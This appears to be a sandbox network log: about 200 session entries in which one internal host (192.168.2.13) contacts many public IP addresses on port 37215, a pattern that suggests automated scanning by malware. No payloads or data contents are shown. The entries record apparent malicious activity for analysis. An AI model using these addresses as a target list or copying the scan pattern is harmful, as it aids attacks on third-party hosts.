                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19408192.168.2.1350304157.70.105.2237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19409192.168.2.1357686157.148.233.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19410192.168.2.1333394157.70.78.837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19411192.168.2.1340496197.53.186.14237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19412192.168.2.133839641.243.226.13237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19413192.168.2.1341362112.85.246.12037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19414192.168.2.1353918197.177.202.16237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19415192.168.2.1355248161.156.134.8637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19416192.168.2.1357282197.248.21.17537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19417192.168.2.135540042.246.123.25237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19418192.168.2.1352156197.121.237.23337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19419192.168.2.1347648197.205.149.15537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19420192.168.2.1337386157.5.100.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19421192.168.2.134566441.244.26.17837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19422192.168.2.133920841.239.173.12837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19423192.168.2.134727641.214.214.10037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19424192.168.2.1336764170.235.140.10737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19425192.168.2.1349180157.139.157.7037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19426192.168.2.134392464.180.185.21937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19427192.168.2.1341576157.84.180.19437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19428192.168.2.133681241.155.33.9337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19429192.168.2.1356232157.168.96.21337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19430192.168.2.134393077.35.209.1737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19431192.168.2.134933041.101.249.20737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19432192.168.2.1346330157.143.83.21537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19433192.168.2.135995241.218.84.8037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19434192.168.2.1345262197.21.95.24437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19435192.168.2.1337920197.162.101.20737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19436192.168.2.135328841.226.200.137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19437192.168.2.1343702157.176.13.12437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19438192.168.2.1352610156.175.6.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19439192.168.2.135383841.118.199.6237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19440192.168.2.1342898196.241.56.19937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19441192.168.2.134645012.71.145.4237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19442192.168.2.1353120157.134.198.22537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19443192.168.2.1359264157.138.18.20037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19444192.168.2.1341442197.144.152.25437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19445192.168.2.1350856194.54.68.19537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19446192.168.2.1344202162.39.234.9637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19447192.168.2.1333454157.127.112.15537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19448192.168.2.135112086.6.139.18037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19449192.168.2.135999641.254.39.8037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19450192.168.2.1353258157.111.191.25137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19451192.168.2.1338974212.169.218.10637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19452192.168.2.1355996146.31.39.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19453192.168.2.1357116175.231.206.7037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19454192.168.2.1339888115.237.33.2837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19455192.168.2.1352648157.196.207.17137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19456192.168.2.1348888197.0.30.11637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19457192.168.2.1360114157.26.49.17837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19458192.168.2.1338730197.212.62.9237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19459192.168.2.1341960157.79.89.21637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19460192.168.2.133785074.155.22.1837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19461192.168.2.1356756197.184.145.18937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19462192.168.2.1335328136.106.56.21537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19463192.168.2.135371841.57.126.15737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19464192.168.2.135384641.89.176.537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19465192.168.2.1348648197.169.77.9237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19466192.168.2.134924241.65.52.10537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19467192.168.2.1335594157.233.99.12037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19468192.168.2.1339376157.87.68.25037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19469192.168.2.134664841.168.159.14437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19470192.168.2.135141488.91.2.14837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19471192.168.2.135874834.23.49.10337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19472192.168.2.134528441.206.170.5937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19473192.168.2.135721841.1.119.20737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19474192.168.2.1343960131.98.22.24537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19475192.168.2.1357306197.65.233.14137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19476192.168.2.1342248157.16.99.15937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19477192.168.2.1360260157.39.190.4537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19478192.168.2.1343982191.181.147.24537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19479192.168.2.134656041.156.121.6737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19480192.168.2.1357286157.204.122.10737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19481192.168.2.13501164.251.246.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19482192.168.2.135347041.86.2.3937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19483192.168.2.133864641.193.180.19437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19484192.168.2.1337760157.251.227.16737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19485192.168.2.1353008157.162.133.21137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19486192.168.2.1358012193.186.236.17637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19487192.168.2.1336108141.231.45.21037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19488192.168.2.135988273.15.35.1637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19489192.168.2.135493241.27.250.237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19490192.168.2.1346930197.44.211.2237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19491192.168.2.133735041.212.232.21337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19492192.168.2.1338724197.224.126.21037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19493192.168.2.133480241.80.197.2737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19494192.168.2.1359076157.191.149.4937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19495192.168.2.1358660197.180.222.5637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19496192.168.2.1344984112.90.223.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19497192.168.2.1334844197.139.133.3637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19498192.168.2.134156441.77.101.7637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19499192.168.2.133764241.215.233.23737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19500192.168.2.133744641.240.249.21937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19501192.168.2.1333842157.99.193.14737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19502192.168.2.135077841.107.207.24137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19503192.168.2.135588651.78.234.17537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19504192.168.2.135662018.246.4.18537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19505192.168.2.1334052197.131.102.7737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19506192.168.2.1337776197.171.111.16837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19507192.168.2.1340284148.33.191.537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19508192.168.2.134739241.216.43.8737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19509192.168.2.1344726197.239.59.7237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19510192.168.2.1333670157.100.34.24737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19511192.168.2.1341882157.54.245.6437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19512192.168.2.134087041.224.158.21437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19513192.168.2.1349974197.195.244.7337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19514192.168.2.133963241.31.205.23437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19515192.168.2.136027241.7.107.16337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19516192.168.2.1356340157.24.230.20037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19517192.168.2.1344044157.115.132.8737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19518192.168.2.135820817.174.247.19637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19519192.168.2.1342122168.208.247.22337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19520192.168.2.1355712141.112.171.037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19521192.168.2.1340186157.59.148.12737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19522192.168.2.133476841.230.135.15037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19523192.168.2.1335310197.221.30.22837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19524192.168.2.133776641.181.35.25137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19525192.168.2.1358426145.166.56.237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19526192.168.2.134601641.4.29.17437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19527192.168.2.1350412197.160.28.16937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19528192.168.2.135015841.174.82.10337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19529192.168.2.1339432197.193.123.7637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19530192.168.2.135146641.8.165.19737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19531192.168.2.134221241.207.26.23737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19532192.168.2.135924865.116.232.24337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19533192.168.2.1355222193.31.250.6337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19534192.168.2.1338860157.31.182.23437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19535192.168.2.135795441.146.170.3537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19536192.168.2.135972041.68.10.537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19537192.168.2.1333754157.247.14.11037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19538192.168.2.1352366157.250.248.23637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19539192.168.2.1339236197.241.217.23337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19540192.168.2.1359526197.88.107.11537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19541192.168.2.1335006157.85.42.24437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19542192.168.2.133534446.55.232.8837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19543192.168.2.1344820157.166.25.4737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19544192.168.2.1337222157.225.58.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19545192.168.2.1346954102.207.226.16737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19546192.168.2.1349834157.2.114.22837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19547192.168.2.133950241.111.110.21337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19548192.168.2.1346046157.19.165.12437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19549192.168.2.1355956197.26.80.1037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19550192.168.2.135477641.141.78.10537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19551192.168.2.134149241.41.204.7937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19552192.168.2.1343738203.132.12.22537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19553192.168.2.1343776197.87.86.22237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19554192.168.2.1346082157.21.150.19937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19555192.168.2.1339764197.248.127.2337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19556192.168.2.1348410197.30.219.22137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19557192.168.2.1345688157.161.162.7037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19558192.168.2.1347636197.116.71.17137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19559192.168.2.134397485.29.106.4837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19560192.168.2.1338104157.65.148.16137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19561192.168.2.1340628197.141.211.18037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19562192.168.2.133393841.212.83.10637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19563192.168.2.136083641.213.44.23637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19564192.168.2.134763241.236.237.14337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19565192.168.2.134042441.132.158.6237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19566192.168.2.1334154157.23.175.22937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19567192.168.2.1350120157.236.0.6537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19568192.168.2.1353596197.144.65.8037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19569192.168.2.134003041.110.161.21637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19570192.168.2.1335050157.115.95.24737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19571192.168.2.134982841.131.71.13637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19572192.168.2.1353202201.185.254.11137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19573192.168.2.1347186197.245.203.2037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19574192.168.2.134207259.143.47.13737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19575192.168.2.1334978157.105.78.10037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19576192.168.2.133737441.74.83.14437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19577192.168.2.1347930157.77.143.9137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19578192.168.2.1347896197.202.105.22837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19579192.168.2.1358344152.55.87.17837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19580192.168.2.1354658124.73.63.9537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19581192.168.2.1360364197.96.120.737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19582192.168.2.1358800197.198.162.3737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19583192.168.2.1356424157.46.188.6337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19584192.168.2.1349036197.20.117.6137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19585192.168.2.1336700140.52.6.24037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19586192.168.2.1344354157.85.2.17237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19587192.168.2.135696444.247.106.4037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19588192.168.2.1360666157.251.77.8937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19589192.168.2.133884841.196.230.937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19590192.168.2.1342596122.210.146.23437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19591192.168.2.1352704157.183.235.16337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19592192.168.2.1336954109.221.102.13837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19593192.168.2.1343920197.187.142.17737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19594192.168.2.1339778197.45.247.2737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19595192.168.2.134687041.223.24.1837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19596192.168.2.13560881.43.7.23337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19597192.168.2.1343048139.15.244.14137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19598192.168.2.1337642157.98.192.23337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19599192.168.2.1341850186.1.6.9537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19600192.168.2.135689459.182.55.20337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19601192.168.2.133999241.173.241.21937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19602192.168.2.1356546197.237.235.13037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19603192.168.2.135472841.223.209.10537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19604192.168.2.135175641.178.56.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19605192.168.2.1340426207.147.100.15937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19606192.168.2.1348408197.218.26.7437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19607192.168.2.1360298177.121.84.18237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19608192.168.2.1334942197.178.22.15837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19609192.168.2.135686441.218.36.2837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19610192.168.2.1358904134.50.240.23837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19611192.168.2.1350476157.220.134.4537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19612192.168.2.1350976198.196.199.21537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19613192.168.2.1359308197.28.55.6337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19614192.168.2.134400041.244.226.15237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19615192.168.2.1353444157.49.220.21537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19616192.168.2.1356858197.191.37.17237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
